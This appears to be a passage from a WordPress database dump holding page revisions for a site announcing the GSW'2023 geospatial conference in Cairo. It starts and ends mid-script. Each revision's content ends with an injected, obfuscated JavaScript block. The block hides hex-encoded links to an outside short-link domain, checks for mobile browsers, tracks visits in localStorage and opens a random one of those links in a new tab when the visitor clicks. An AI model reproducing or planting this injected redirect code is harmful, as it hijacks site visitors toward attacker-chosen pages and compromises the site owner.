_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:10:04','2022-11-09 15:10:04','',3066,'https://gsw2023.com/?p=3130',0,'revision','',0),
(3131,1,'2022-11-09 15:10:48','2022-11-09 15:10:48','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_size=\"contain\" awb_image_background_position=\"0% 200%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"3068\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:10:48','2022-11-09 15:10:48','',3066,'https://gsw2023.com/?p=3131',0,'revision','',0),
(3132,1,'2022-11-09 15:12:20','2022-11-09 15:12:20','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"color\" awb_stretch=\"1\" awb_color=\"#1e73be\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 